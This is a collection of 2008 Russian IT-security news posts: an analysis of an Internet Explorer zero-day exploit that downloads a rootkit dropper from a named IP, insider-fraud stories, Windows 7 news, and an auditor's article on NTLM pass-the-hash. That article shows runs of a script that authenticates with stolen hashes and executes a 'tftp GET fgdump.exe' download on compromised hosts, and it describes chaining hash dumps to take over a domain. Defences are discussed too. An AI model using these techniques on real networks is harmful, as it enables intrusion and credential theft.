Обнаружение атак ISO\|IEC 27001 A.10.10.2	Должны быть определены требования к системам обнаружения беспроводных атак, закреплена ответственность за анализ событий
Протоколирование и анализ событий безопасности ISO\|IEC 27001 A.10.10.1	Данный раздел может быть расширен путем добавления в список контролируемых событий, специфичных для беспроводных сетей. Может включать в себя предыдущий раздел
Удаленный доступ к сети ISO\|IEC 27001 A.11.7.2	В большинстве случаев пользователей беспроводной сети логично относить к пользователям систем удаленного доступа. Это обусловлено аналогичными угрозами и как следствие - контрмерами, характерными для данных компонентов ИС

Кроме того, в том или ином виде должны быть сформированы следующие документы:

инструкция для пользователей с учетом использования беспроводной сети;
базовые настройки точек доступа, беспроводных коммутаторов, рабочих станций;
процедуры контроля защищенности беспроводных сетей;
профили систем обнаружения атак;
процедуры по реагированию на инциденты в беспроводной сети.

Правильно построенная и соблюдаемая политика безопасности является надежным фундаментом защищенной беспроводной сети. Вследствие этого стоит уделять ей достаточное внимание, как на этапе внедрения сети, так и в ходе ее эксплуатации, отражая в нормативных документах изменения, происходящие в сети.

Медведев назначил надзорный орган для российской ИТ-отрасли

2008-12-14T16:52:06Z

У российской ИТ-отрасли появился свой надзорный орган. Функции надзора за российскими информационными технологиями с 3 декабря отошли к Россвязькомнадзору (Федеральной службе по надзору в сфере связи и массовых коммуникаций), бывшей Росохранкультуре.

Указ о реорганизации Россвязькомнадзора и переименовании его в Федеральную службу по надзору в сфере связи, информационных технологий и массовых коммуникаци. президент Дмитрий Медведев подписал 3 декабря.

Хотя в действующем «Положении о Федеральной службе по надзору в сфере связи и массовых коммуникаций» (подписано премьер-министром Владимиром Путиным 2 июня 2008 г.) среди полномочий в п. 5.1.1.3. упоминается «надзор в сфере информационных технологий», единственной замеченной за Россвязькомнадзором функцией, имеющей отношение к ИТ был «надзор за соответствием обработки персональных данных».

Основная деятельность службы до сих пор относилась к контролю в сфере связи (в том числе к лицензированию операторов и распределению частотного ресурса) и СМИ (в том числе к лицензированию изданий).

Известно, что преобразованный Россвязькомнадзор останется в ведении Минкомсвязи, где он находится с весны 2008 г., когда служба была выведена из подчинения председателя правительства.

Анализ уязвимости «нулевого дня» в Microsoft Internet Explorer

2008-12-14T16:49:12Z

Эта неделя выдалась для компании Microsoft сложной. Помимо выпуска 8 плановых бюллетеней безопасности, которые устранили 28 уязвимостей, стало известно еще о 3-х уязвимостях, исправления к которым отсутствуют на настоящий момент.

В этой статье мы рассмотрим полученный нами образец вредоносного кода, эксплуатирующий уязвимость «нулевого дня» (0-day) при обработке XML тегов в Microsoft Internet Explorer.

Речь идет о новой уязвимости, которая не была устранена в вышедшем вчера исправлении MS08-073. Корректная работа эксплоита подтверждена на системах Windows XP и Windows Server 2003 с установленными последними обновлениями. В связи со спецификой экплойта, вероятность успешной экплуатции составляет 1 к 3.

Каковы последствия?

Поскольку иформация об уязвимости и о методах её экплутации широко известна, высока вероятность использования её в ближайшее время для массового заражения компьютеров. Наиболее вероятными векторами является размещение экплойта на взломанных сайтах, а также массовая рассылка писем со ссылкой на уязвимый код с использованием СПАМа.

В результате возможно массовое заражение компьютеров агентами бот-сетей и руткитами домашних пользователей, а также рабочих станций в корпоративных сетях, использующих Internet Explorer 7.

Как работает эксплоит?

Уязвимость существует из-за переполнения динамической памяти в обработчике XML. Эксплоит, после приведения в порядок динамической памяти, выделяет 159 массивов, содержащих исполняемый код. Перед выполнением кода, эксплоит осуществляет проверку на наличие Internet Explorer 7 и Windows XP или Windows 2003.

Пример кода, осуществляющего проверку:

Если браузер соответствует этим требованиям, создается XML тег. Затем происходит обращение к Web серверу, расположенному в Китае, и на систему скачивается файл ko.exe, который начинает установку компонентов руткита.

В данный момент эксплоит скачивает файл ko.exe с IP адреса 59.34.216.222.

По данным VirusTotal файл ko.exe обнаруживается следующими антивирусами:

Антивирус	Версия	Последнее обновление	Результат
AhnLab-V3	2008.12.10.0	2008.12.10	-
AntiVir	7.9.0.43	2008.12.09	TR/Spy.Gen
Authentium	5.1.0.4	2008.12.10	W32/Busky.B.gen!Eldorado
Avast	4.8.1281.0	2008.12.10	Win32:Runner-Z
AVG	8.0.0.199	2008.12.09	-
BitDefender	7.2	2008.12.10	Rootkit.Agent.AIWN
CAT-QuickHeal	10.00	2008.12.09	-
ClamAV	0.94.1	2008.12.10	-
Comodo	713	2008.12.09	-
DrWeb	4.44.0.09170	2008.12.10	DLOADER.Trojan
eSafe	7.0.17.0	2008.12.09	Suspicious File
eTrust-Vet	31.6.6253	2008.12.10	-
Ewido	4.0	2008.12.09	-
F-Prot	4.4.4.56	2008.12.09	W32/Busky.B.gen!Eldorado
F-Secure	8.0.14332.0	2008.12.10	Suspicious:W32/Malware!Gemini
Fortinet	3.117.0.0	2008.12.10	-
GData	19	2008.12.10	Rootkit.Agent.AIWN
Ikarus	T3.1.1.45.0	2008.12.10	Trojan-Dropper.Win32.Agent
K7AntiVirus	7.10.549	2008.12.09	-
Kaspersky	7.0.0.125	2008.12.10	-
McAfee	5459	2008.12.09	Downloader-BLE
McAfee+Artemis	5459	2008.12.09	Generic!Artemis
Microsoft	1.4205	2008.12.09	TrojanDownloader:Win32/Small.gen!AO
NOD32	3680	2008.12.10	probably a variant of Win32/TrojanDownloader.Agent.ONB
Norman	5.80.02	2008.12.09	-
Panda	9.0.0.4	2008.12.09	Suspicious file
PCTools	4.4.2.0	2008.12.09	-
Prevx1	V2	2008.12.10	-
Rising	21.07.20.00	2008.12.10	Trojan.Win32.Edog.bh
SecureWeb-Gateway	6.7.6	2008.12.10	Trojan.Spy.Gen
Sophos	4.36.0	2008.12.10	Mal/Behav-009
Sunbelt	3.1.1832.2	2008.12.01	-
Symantec	10	2008.12.10	Trojan.Dropper
TheHacker	6.3.1.2.182	2008.12.10	-
TrendMicro	8.700.0.1004	2008.12.10	PAK_Generic.001
VBA32	3.12.8.10	2008.12.09	-
ViRobot	2008.12.9.1509	2008.12.09	-
VirusBuster	4.5.11.0	2008.12.09	Trojan.Runner.Gen

Кратко о файле ko.exe

Дополнительные данные о файле

размер: 33280 байт

MD5...: a4f025331518f4ae96915fc55a4f2d38

SHA1..: f67d4f685cf0c4dc968ef514c99f42e6fc17817b

SHA256: d190115e7d289c3691c0108071504fd197efc7dacc26678219844fc687a383a4

SHA512: 08bf105108ac90f08e110f8adcbb4260b523d5a86020faadf9942f47e2c8fefe
34af705e69fa9a80160a46d9b8f7a8239497b941e81cc16b13b14af1d73298cf

ssdeep: 768:q6UvFrkRmnfYNSxE+WpJhUjkeDRmMK2ftkqt/n4X0Gyr:qNgQfYA2+cJqjvN
t+W/1Gyr

PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

TrID..: File type identification
Win64 Executable Generic (52.5%)
UPX compressed Win32 Executable (18.7%)
Win32 EXE Yoda's Crypter (16.3%)
Win32 Executable Generic (5.2%)
Win32 Dynamic Link Library (generic) (4.6%)

PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x416540
timedatestamp.....: 0x493e7d0a (Tue Dec 09 14:13:30 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0xe000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0xf000 0x8000 0x7800 7.89 736f42ec6ac402b4124df48ed7b7ed89
.rsrc 0x17000 0x1000 0x600 3.14 2223c904b9b1cb84ee9651276f59a40c

( 8 imports )
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, ExitProcess
> ADVAPI32.dll: RegCloseKey
> MSVCRT.dll: atoi
> NETAPI32.dll: Netbios
> PSAPI.DLL: EnumProcessModules
> SHELL32.dll: ShellExecuteA
> SHLWAPI.dll: SHDeleteKeyA
> USER32.dll: wsprintfA

Каким образом защититься?

В качестве временного решения SecurityLab рекомендует отключить в браузере Active Scripting. Также рекомендуем запретить доступ к IP адресу 59.34.216.222, с которого в настоящий момент происходит загрузка файла.

Использование средств фильтрации содержимого уровня предприятия представляется малоэффективной, поскольку высока вероятность использования методов кодирования экплойта с помощью Javascript. Но пренебрегать этой возможностью не стоит. Рекомендуется связаться с поставщиком используемых средств защиты уровня узла (антивируса, end-point security) для уточнения наличия в продукте методов предотвращения использования данной уязвимости.

blondyn @ 2008-12-06T01:16:00

2008-12-05T22:17:03Z

От IT ждут помощи

2008-12-05T16:37:53Z

Однако ожидания бизнеса зачастую нереалистичны

В условиях кризиса бизнес-руководители стали чаще обращаться к ИТ-директорам за помощью. По данным организации CIO Connect, 62% опрошенных ИТ-руководителей отметили, что топ-менеджмент спрашивает их рекомендаций относительно лучшей адаптации используемых технологий в бизнес-процессах. Однако при этом в 42% случаев респонденты признают, что ожидания бизнеса зачастую «нереалистичны». Несмотря на растущий интерес бизнес-руководства к технологиям, лишь 20% ИТ-руководителей входят в состав совета директоров компании. О чем же общаются ИТ-директора с другими руководителями? Как выяснилось 55% обсуждают стратегию, 54% - изменения в компании, а по 39% говорят о прибыльности бизнеса и текущих ИТ-проектах. Что характерно, 70% признают, что их ожидают крайне непростые времена – приоритетом на следующий год стало повышение ценности ИТ для бизнеса. В связи с этим они фокусируются на уходе от унаследованных приложений и стандартизации ИТ-платформ.

Хакер-наркоман перепродал трафик провайдера на пол миллиона рублей

2008-11-11T23:06:59Z

Сотрудниками Управления ФСБ и УВД Астраханской области по подозрению в осуществлении противоправной деятельности, связанной с неправомерным доступом к биллинговым системам провайдера ЗАО «Транк», задержан неработающий, 1981 г.р. Будучи студентом факультета информационных технологий одного из астраханских ВУЗов, он получил знания, необходимые для работы на ПЭВМ и в сети Интернет. Однако из-за своего пристрастия к наркотикам потерял работу и к моменту задержания уже имел две судимости.

В ходе оперативно розыскных мероприятий установлено, что молодой человек ранее работая администратором сети компании «Транк», выявил уязвимые места в программном обеспечении биллинговой системы, что позволило ему в последующем осуществлять модификацию данных фирмы провайдера.

После увольнения, имея права администрирования и управления ресурсами, он посещал адреса проживания клиентов ЗАО «Транк» и удаленным доступом осуществлял зачисления финансовых средств на их лицевые счета, которые впоследствии присваивал. Правоохранительные органы выявили более 80 эпизодов указанных мошеннических операций.

Получив также доступ к базе данных РТМ-кодов карт оплаты кабельного Интернета «КИТ», он скопировал их и в последующем использовал для проведения противоправной деятельности, продавая охраняемую законом коммерческую информацию в виде кодов доступа активации карт.

Кроме того, он осуществил модификацию статуса реквизитов доступа нескольких пользователей сети Интернет из числа абонентов ЗАО «Транк», что позволило присваивать ему Интернет-график компании и продавать его от имени провайдера другим лицам.

Как сообщили в группе общественных связей УФСБ России по Астраханской области, общий ущерб от деятельности мошенника составил более 500 000 рублей.

В ходе проведенных обысков сотрудниками правоохранительных органов изъято несколько единиц вычислительной техники и жестких дисков, записи об абонентах ЗАО «Транк», которым хакер осуществлял нелегитимные зачисления денежных средств, продавал реквизиты доступа в сеть Интернет, что подтвердило полученную правоохранительными органами информацию о характере его противоправной деятельности. В квартире задержанного обнаружены следы приема наркотических веществ, фальшивые стодолларовые купюры, краденые вещи.

Полученные материалы переданы в органы прокуратуры. Решается вопрос о привлечении к уголовной ответственности по ст.ст. 272 (Неправомерный доступ к компьютерной информации), 159 (Мошенничество) и 165 (Нанесение имущественного вреда) УК РФ.

Уволеный админ-наркоман жестоко отомстил работодателю

2008-11-11T23:05:33Z

IT-менеджер одной из американских компаний, являющийся по совместительству наркоманом-кокаинистом, после увольнения запустил спамеров на корпоративный сервер бывших работодателей. За такие проделки хулигана приговорили к лишению свободы сроком на один год и один день.

Стивен Барнс, житель штата Калифорния, в период с сентября 2002 по апрель 2003 года работал IT-менеджером в вещательной компании Blue Falcon Networks (в настоящий момент - Akimbo Systems). После того, как из компании его уволили, он совершил две атаки на её сервера - 30 сентября и 1 октября 2003 года.

Во время первой атаки Барнс поменял почтовый сервер BFN на открытый сервер, дав возможность всем желающим интернет-пользователям обмениваться через него электронными письмами. Очень скоро сервером компании стали пользоваться спамеры, и почтовый трафик компании был помещен в черный список, от чего сотрудники не могли общаться как между собой, так и с клиентами. Кроме того, Барнс удалил базу данных электронной корреспонденции компании.

На этом злоумышленные действия бывшего работника не закончились, и атаки возобновились. В ходе второй атаки он поменял доменные имена электронного сервера, заблокировав таким образом возможность получать письма. Затем хакер снова стер базу данных.

По словам самого преступника, к таким действиям его подтолкнуло обращение с ним бывших коллег: один из работников Blue Falcon приехал к нему вместе со своим сыном, и, угрожая бейсбольной битой, запретил двигаться, вынес все его компьютеры (включая два персональных), и потребовал подписать документ об увольнении.

Японская технология позволяет загрузить Linux за 3 секунды

2008-11-11T22:44:51Z

Японская компания Lineo, разрабатывающая встроенные Linux-решения, разработала технологию быстрого старта ядра Linux, которая позволяет загрузить ядро открытой операционной системы на маломощные и встроенные системы за 2,97 секунды. Как говорят разработчики, концептуально их система похожа на используемые сейчас в операционных системах механизмы "спящего режима", когда на жесткий диск сбрасываются некоторые уже загруженные данные, содержимое оперативной памяти и прочая информация.

Японская система Warp2 включает в себя специальный загрузчик, ядро Linux и фирменную систему быстрой загрузки. Система быстрой загрузки при помощи системных драйверов делает снимок содержимого оперативной памяти во флеш-память устройства.

Изюминка японской разработки состоит в том, что сбросить на постоянную память можно все элементы загрузки и сделать несколько снимков, которые позволяют просто включить систему по быстрому варианту или загрузить ее в обычном режиме. В Lineo говорят, что Wasp2 требует значительно меньше памяти для сохранения оперативных данных за счет нового механизма сжатия, так если объем стандартных в ОЗУ составляет 32 Мб, то в сжатом сброшенном на флеш-модуль варианте - менее 19 Мб.

Lineo демонстрирует свою разработку на базе устройства Atmark Armadillo-500 на базе процессора AMR11 c частотой 400 МГц. В обычном режиме загрузка занимает 31,11 секунды, с активированной системой Warp2 - 3,40 секунды. Сброс оперативных данных в размере 19 Мб при первичной загрузке занимает 2.97 секунды.

Видеозапись работы Wasp2 можно посмотреть по адресу http://www.lineo.co.jp/products-services/services/warp.html

Windows 7 утекла в интернет

2008-11-11T22:42:41Z

Операционную систему Windows 7 можно скачать с нескольких торрент-порталов. Операционная система попала в интернет уже через несколько часов после того, как ее тестовая версия была подарена участникам конференции разработчиков Microsoft, прошедшей неделю назад.

Первым торрент-порталом, где появилась Windows 7, стал The Pirate Bay. 29 октября на нем была выложена 32-разрядная версия Windows 7. Днем позже появилась 64-разрядная Windows 7. Объем 32-разрядной версии Windows 7 составляет 2,72 гигабайта, 64-разрядной - 3,36 гигабайта.

Windows 7 была публично продемонстрирована на конференции разработчиков Microsoft 28 октября. В соответствии с планами корпорации, бета-версия операционной системы будет выпущена в следующем году, в то время как коммерческий релиз системы ожидается в начале 2010 г.

Microsoft официально представила Windows 7

2008-11-11T22:41:42Z

Корпорация Microsoft впервые показала предварительную версию Windows 7, рассказала об ее основных преимуществах и нововведениях. Новая операционная система обладает улучшенной системой безопасности, обновленным интерфейсом, поддерживает сенсорную технологию ввода и работает на маломощных ПК. Бета-версия системы ожидается в 2009 г.

Корпорация Microsoft впервые продемонстрировала предварительную рабочую версию Windows 7, рассказав об ее основных преимуществах и нововведениях. Ознакомиться с возможностями новой операционной системы первыми смогли участники конференции PDC, которая проходит в эти дни в Лос-Анджелесе, сообщает DailyTech.

Представители Microsoft отметили, что в новой Windows усовершенствована система безопасности. В частности, улучшена работа User Account Control (UAC). В новой версии пользователь сможет выставить уровень доступа для того, чтобы окно UAC не возникало каждый раз при попытке изменить системные параметры.

Платформа разбита на три части: ядро Windows 7 и основные файлы, пакет Windows Live + Windows Live Essentials и пакет Windows Live Services. Производители ПК получат возможность устанавливать пакет Windows Live Essentials, который обеспечит пользователей всем необходимым для начала работы. В состав пакета войдут приложения Windows Live Mail, Messenger, Movie Maker, Photo Gallery, Writer и некоторые другие. Пакет Services, в свою очередь, предназначен для работы с Hotmail и другими службами в интернете.

Существенно переработан интерфейс системы, панель задач и меню «Пуск». Теперь названия программ и заголовки открытых документов в панели задач не отображаются – здесь нет никакого текста, а только иконки. Получить доступ к основным функциям можно, не разворачивая приложение, – достаточно нажать на соответствующую иноку в панели задач правой кнопкой мыши. Например, в случае с Windows Media Player пользователь может открыть список воспроизведения, а в случае с Internet explorer – просмотреть уменьшенные изображения открытых веб-страниц и переключиться между ними. В меню «Пуск» появился доступ к наиболее часто открываемым папкам.

При нажатии мышкой на свободное место на рабочем столе, все открытые окна становятся прозрачными – это помогает добраться до виджетов, которые в Windows 7 могут располагаться произвольно на рабочем столе, а не в его определенной части, как в Vista. При перетаскивании окна, оно увеличивается – когда пользователь удерживает его мышкой, и уменьшается, когда отпускает в нужном месте – как в Mac OS. Если открытое окно подвести к краю рабочего стола, оно уменьшится до 50% от номинального размера – это удобно для организации окон. Улучшен вывод изображения на мультиэкранные системы. Кроме того, Windows 7 поддерживает сенсорную технологию ввода – об этом сообщалось ранее.

Microsoft планирует устанавливать Windows 7, в том числе, и на нетбуки, отличающиеся невысокой мощностью. В связи с этим требования Windows 7 к аппаратному обеспечению – за что так ругают Windows Vista – снижены. На конференции был продемонстрирован нетбук с процессором 1 ГГц и оперативной памятью 1 ГБ (производитель нетбука и тип процессора неизвестны), на котором была запущена Windows 7. Система работала на этом компьютере довольно шустро – даже при свободных 512 МБ оперативной памяти. С другой стороны, новая операционная система сможет поддерживать до 256 процессоров.

Особое внимание было уделено совместимости платформ. Windows 7 разработана на основе Vista, и все приложения, выпущенные для последней, будут работать и на Windows 7. В свое время проблема совместимости также вызвала море критики. Пользователи обнаружили, что приложения, которые они запускали на Windows XP, отказались работать на Vista.

В соответствии с планами корпорации, бета-версия операционной системы будет выпущена в следующем году, в то время как коммерческий релиз системы ожидается в начале 2010 г.

NTLM не умер, он просто так пахнет

2008-11-11T22:38:15Z

Антон Карпов
Аналитик по информационной безопасности Digital Security
a.karpov@dsec.ru
http://www.dsec.ru

О проблемах безопасности протоколов LM/NTLM сказано немало. Поэтому для того, чтобы в очередной раз поднимать эту тему, нужны некоторые причины. И такие причины есть. Во-первых, опыт проведения аудита в крупных корпоративных сетях наглядно показывает: по состоянию на конец 2008 года даже старый LanManager кое-где еще живее всех живых. Иными словами, данная статья, как и приведенная в статье утилита, никогда не были бы написаны, если бы их актуальность не была подтверждена регулярной практикой. Вторая причина является следствием первой и заключается в регулярном появлении на известных конференциях по безопасности (BlackHat, Defcon) материалов на заданную тематику, как и различного вида программных средств для проведения атак на NTLM-хэши. Поэтому скептикам, приготовившим аргумент в виде слова "Kerberos", рекомендуется глубоко вдохнуть и пойти проверить свою Windows-сеть на наличие описываемых проблем.

Немного скучной теории. Аутентификация и пароли

Чтобы понять, какую роль протокол NTLM играет в аутентификационном процессе на Windows-машине, рассмотрим, что же происходит после нажатия заветной комбинации Ctrl+Alt+Delete во время интерактивного входа в систему. Процесс Winlogon, а точнее, графическая библиотека GINA (Graphical Identification and Authentication) принимает введенные пользователем аутентификационные данные (имя пользователя и пароль, PIN-код от смарт-карты и т.п.) и инициирует обращение в LSA (Local Security Authority). В случае осуществления локального входа, LSA выполняет обращение в локальную SAM-базу для аутентификации пользователя и возвращает процессу Winlogon токен доступа. После этого, в случае успешной аутентификации, пользователь получает доступ к графической оболочке.
В случае использования доменной структуры пользователя аутентифицирует не локальная LSA, а LSA на контроллере домена, хранящего учетные записи доменных пользователей в Active Directory. Для удаленного взаимодействия этих подсистем (т.е. для аутентификации пользователя или компьютера по сети) используются т.н. аутентификационные пакеты (authentication package), реализующие различные протоколы аутентификации. Таковых всего два: NTLM (библиотека MSV1_0.dll) и Kerberos (библиотека Kerberos.dll). Начиная с Windows 2000, для совершения процедуры доменной аутентификации по умолчанию используется протокол Kerberos (строго говоря, начиная с Windows 2000 LSA по умолчанию выбирает пакет Kerberos вне зависимости от вида входа в систему, но этот аутентификационный пакет не умеет выполнять локальную аутентификацию, и в случае локального входа выполняется fallback на NTLM для обращения к SAM-базе с хэшами паролей).

Пароли в Windows шифруются одним из двух возможных способов: LM и NTLM-хэш. Слабости обоих алгоритмов общеизвестны: отсутствие т.н. «соли» (salt) для рандомизации выходной последовательности (строго говоря, протокол LM использует фиксированное значение «соли» - «KGS!@#$%», NTLM же представляет собой просто MD4-хэш пароля пользователя), что открывает возможность использования Rainbow-таблиц для подбора пароля. Кроме того, LM-хэш является крайне нестойким (максимальная длина пароля составляет 14 символов, недостающие символы дополняются нулями, а затем пароль делится на две части по 7 символов, которые шифруются отдельно с помощью алгоритма DES) и вскрывается с использованием современных вычислительных мощностей за конечное время.

В Windows штатно присутствует три механизма удаленной аутентификации, реализованных в аутентификационных пакетах NTLM и Kerberos, о которых сказано выше. Это LM/NTLM challenge-response, NTLMv2 challenge-response и Kerberos. Недостатки первых двух также общеизвестны: для аутентификации доменным пользователем совершенно необязательно иметь его пароль, так как в процедуре аутентификации используется только хэш пароля учетной записи пользователя. Именно на этом свойстве протокола построены атаки вида Pass-the-Hash, первое упоминание о которых датируется аж 1997 годом.

Зачем мне все это в 2008 году?

Наконец, мы подходим к главной причине, по которой в этой статье собраны материалы более чем десятилетней практики security-сообщества, и имя ей – обратная совместимость. Так, только лишь в Windows Vista / Windows Server 2008 генерация LM-хэшей по умолчанию отключена (опция NoLmHash в разделе реестра HKLM\SYSTEM\CurrentControlSet\Control\Lsa), все предыдущие версии ОС, включая самый распространенный на сегодняшний день в корпоративной среде Windows Server 2003, по умолчанию генерируют и хранят LM-хэши для паролей, длина которых меньше 14 символов. Однако это не самое страшное. Гораздо более неприятен следующий факт: не смотря на то, что все серверные версии Windows, начиная с Server 2000, по умолчанию используют Kerberos для удаленной аутентификации пользователя или ресурса, протокол LM/NTLM challenge-response все еще поддерживается и может быть использован, если клиент инициирует такое соединение. За эту поддержку отвечает ключ реестра LmCompatibilityLevel в разделе реестра HKLM\SYSTEM\CurrentControlSet\Control\Lsa, который может принимать целочисленное значение от 0 до 5. В Windows Server 2003 этот параметр по умолчанию имеет значение 2, в Windows Vista / Server 2003 – 3, и для контроллера домена означает возможность использования клиентом LM/NTLM или NTLMv2 challenge-response протокола для удаленной аутентификации.

Неудивительно, что в настоящее время широко распространены утилиты для «игр» с NTLM-хэшами, а сама задача получения хэша является более чем актуальной. Еще бы, ведь даже в сети, построенной на самой современной на текущий день серверной платформе Windows Server 2008, получение хотя бы одного хэша учетной записи, обладающей административными правами на каком-либо сервере, может привести к получению удаленного административного доступа к контроллеру домена, а значит, и ко всем серверам и рабочим станциям в домене. Этому способствует сильная связанность в корпоративных сетях: опыт проведения аудитов показывает, что ситуация, при которой обнаруженная на одном сервере учетная запись подойдет, по крайней мере, на еще один сервер, является более чем типичной. Получив, таким образом, доступ к новому серверу и сняв с него новые хэши паролей, есть большая вероятность инициировать лавинный процесс, который рано или поздно приведет к получению искомого: учетной записи администратора домена. При этом стоит отметить, что стойкость пароля не имеет никакого значения, ведь ничего не нужно расшифровывать – ни с помощью Rainbow-таблиц, ни «грубой силой».

Как получить хэши?

В «чистом виде» хэши можно получить следующими способами:
- Из AD-хранилища (в случае контроллера домена);
- Из локальной SAM-базы;
- Из кэша LSA, во время активной сессии пользователя.

Если с первыми двумя все понятно, то третий не стоит путать с т.н. “cached logon accounts”, которые хранятся в системе на случай необходимости входа в домен при недоступном контроллере. Во время активного локального или удаленного сеанса работы (например, когда администратор подключается по RDP для выполнения административных задач) LSA хранит активные credentials в памяти, откуда они могут быть получены с помощью таких утилит как whosthere.exe из набора Psh-toolkit (http://oss.coresecurity.com/projects/pshtoolkit.htm) или gsecdump.exe (http://www.truesec.com).

Существуют также альтернативные способы получения NTLM-хэшей, например, довольно эффективно показывает себя в корпоративных сетях перехват хэшей при совершении клиентским браузером NTLM HTTP-аутентификации. Летом 2008 года на конференции DefCon была продемонстрирована утилита Squirtle (http://code.google.com/p/squirtle/) для проведения подобных атак. Однако NTLM-хэш пароля в случае HTTP-аутентификации передается в сообщении (Type 3 message) в зашифрованном случайным значением (nonce) виде и не подходит для немедленного использования, требуя предварительной расшифровки. Поэтому данные методы, хоть и являются весьма интересными, выходят за рамки данной статьи.

PtH-Pwner

Существует большое количество утилит, которые позволяют подменять права текущего пользователя (credentials), используя полученный NTLM-хэш. Самые популярные – это iam.exe из вышеупомянутого набора Psh-toolkit и msvctl.exe от TrueSec. Они позволяют «представляться» в Windows-сети от имени скомпрометированной учетной записи для получения доступа к сетевым ресурсам. Однако у них имеется два недостатка. Первый – их использование ограничено win32-платформой, второй – обе эти утилиты слабо подходят для автоматизации рутинных задач. В то же время практика проведения аудитов защищенности не раз требовала легкого и удобного решения задач вида «на какие еще машины подойдет обнаруженный NTLM-хэш со взломанного сервера», «пройтись по взломанным серверам и добавить учетную запись, вытащить новые хэши паролей» и т.п. Для автоматизации таких задач был написан скрипт на языке shell, по сути являющийся удобной оболочкой для утилиты winexe (линуксовый аналог psexec), пропатченной для возможности аутентификации с помощью NTLM-хэша (http://www.foofus.net/jmk/passhash.html). За отсутствием богатой фантазии у автора скрипт назван pth-pwner и доступен по адресу http://www.dsec.ru/dsecrg/releases/pth-pwner.tar.gz.

Скрипт функционирует под ОС Linux и может работать в двух режимах. В первом он принимает в качестве аргументов имя пользователя (локального или доменного), хэш его пароля и адрес сервера (или подсети). Опционально может быть указан файл, в котором построчно указаны команды для выполнения на сервере (по умолчанию выполняется команда ipconfig), список хостов также может быть указан в файле и передан в качестве аргумента. После запуска утилита пытается аутентифицироваться переданным хэшем на указанных серверах и выполнить заданную команду.

$ ./pth-pwner -u CORP\\domadmin -s 64DFE7...F74F9B:ADF5F3...6BB49AD2 -h 10.11.0.6

[+] PtH-Pwner v. 1.0 (Aug 2008)

Running with the following credentials:
Username to login: domadmin
Domain: CORP
SMBHASH to use: 64DFE7...F74F9B:ADF5F3...6BB49AD2
Host/Subnet to scan: 10.11.0.6
Command to execute: ipconfig

[+] attacking 10.129.11.6

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.11.0.6
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.11.0.7
10.11.0.6 [CORP]: SUCCESS!

All done. 1 scanned, 1 succeeded

$ ./pth-pwner.sh -u LocAdmin -s 64DFE71...F74F9B:ADF5...116BB49AD2 -f hosts.txt -c commands.txt

[+] PtH-Pwner v. 1.0 (Aug 2008)

Running with the following credentials:
Username to login: LocAdmin
SMBHASH to use: 64DFE71...F74F9B:ADF5...116BB49AD2
Reading hosts from hosts.txt
Reading commands from commands.txt

[+] attacking 10.11.0.11
>>>>>>>> attempting to execute [tftp -i 10.11.0.141 GET fgdump.exe] on 10.11.0.11
Transfer successful: 974848 bytes in 1 second, 974848 bytes/s
10.11.0.11 [SERV11]: executing [tftp -i 10.11.0.141 GET fgdump.exe] -> SUCCESS!
[+] attacking 10.11.0.20
>>>>>>>> attempting to execute [tftp -i 10.11.0.141 GET fgdump.exe] on 10.11.0.20
Transfer successful: 974848 bytes in 1 second, 974848 bytes/s
10.11.0.20 [SERV20]: executing [tftp -i 10.11.0.141 GET fgdump.exe] -> SUCCESS!
...

Для еще большей автоматизации процесса можно воспользоваться вторым режимом работы скрипта. Предположим, у нас есть результат работы утилиты gsecdump.exe с какого-либо сервера. Передав при помощи ключа -g на вход скрипту вместо одного NTLM-хэша файл с хэшами в формате gsecdump, мы заставим его проверить каждую присутствующую в файле запись на возможность аутентификации на заданных хостах. Очевидно, что, передав в качестве команды закачивание и выполнение на скомпрометированных хостах утилиты gsecdump.exe, мы можем инициировать тот самый лавинный эффект, который приведет к взлому все большего и большего количества хостов на каждой итерации.

Как защититься?

Очевидно, что никакая парольная политика от описанных атак не спасет, так пароль не подвергается расшифровке, а значит, его стойкость не имеет никакого значения. Переход на двухфакторные методы аутентификации, как ни странно, тоже не исправит ситуацию. NTLM слишком «глубоко вшит» в систему и отключить его полностью не представляется возможным. Так, в Windows 2000 при переходе на аутентификацию по смарт-картам хэш пароля все равно хранится в базе без изменений. В Windows 2003 пароль меняется на случайную последовательность, но, как сказано выше, роли это никакой не играет.

Специалисты из Compass Security AG провели любопытное исследование (http://www.csnc.ch/static/download/Hash_Injection_Attack_E.pdf), в котором попытались как полностью деактивировать аутентификационный пакет NTLM в реестре, так и физически удалить библиотеку MSV1_0.dll с рабочей станции под управлением Windows XP в домене. В обоих случаях ни локальный, ни доменный вход систему стал невозможен.

Все типовые рекомендации (отключение хранения LM-хэшей на серверах и рабочих станциях, выставление параметра LmCompatibilityLevel в максимально возможное значение, отключение локального хранения кэшированных аккаунтов и последующая очистка кэша и т.п.) не являются панацеей от проблемы.

В какой-то степени помочь может принудительное шифрование трафика и аутентификация хостов с помощью IPSec, для невозможности использования хэша с недоверенных систем. Для этого необходимо настроить соответствующие политики на контроллере домена.

Выводы

Алгоритм LanManager (LM) был разработан в начале 90-х годов прошлого века. Операционная система Windows Server 2003 вышла тринадцать лет спустя. И тем не менее, в ней все еще хранились пароли пользователей, зашифрованные с применением этого алгоритма. Виновницей данного факта, как и того, что описанные в статье атаки далеко не первой свежести отлично работают в современных Windows-сетях, является она - та, которая вызывает скрип зубов у разработчиков и крики отчаяния пользователей. Имя ей - backward compatibility.

Ссылки по теме:

http://technet.microsoft.com/ru-ru/magazine/cc160954(en-us).aspx
http://technet.microsoft.com/en-us/library/cc780332.aspx
http://www.securitylab.ru/contest/212100.php
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://www.foofus.net/jmk/passhash.html
http://www.truesec.com/PublicStore/catalog/Downloads,223.aspx
http://www.csnc.ch/static/download/Hash_Injection_Attack_E.pdf
http://truesecurity.se/blogs/murray/archive/2007/03/16/why-an-exposed-lm-ntlm-hash-is-comparable-to-a-clear-text-password.aspx
http://www.innovation.ch/personal/ronald/ntlm.html
http://davenport.sourceforge.net/ntlm.html
http://www.foofus.net/fizzgig/fgdump/
http://carnal0wnage.blogspot.com/2008/03/msvctl-pass-hash-action.html
